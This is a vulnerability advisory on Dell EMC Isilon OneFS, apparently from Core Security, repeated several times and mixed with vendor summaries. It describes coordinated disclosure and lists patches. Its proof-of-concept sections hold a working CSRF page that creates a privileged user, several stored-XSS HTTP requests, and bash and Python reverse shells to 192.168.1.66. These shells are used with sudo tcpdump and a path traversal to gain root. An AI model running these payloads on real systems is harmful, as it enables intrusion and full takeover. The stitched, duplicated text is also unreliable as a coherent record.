scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Dell EMC sent a schedule for fixing six of the reported vulnerabilities, with specific dates for every product's version. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious compadmin may potentially exploit this vulnerability to execute arbitrary code with root privileges. Dell EMC Isilon OneFS Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS is an operating system that runs on it. isi_phone_home tool is one of the phone notification tools. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. CVSS v3 Base Score: 5.9 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L) Cross-Site Request Forgery Vulnerability (CVE-2018-1213) Dell EMC Isilon OneFS is affected by a cross-site request forgery vulnerability. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . **Vendor Information, Solutions and Workarounds** Dell EMC provided a link to the Download for Isilon OneFS page which contains the patches: . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the NDMP Page within the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding 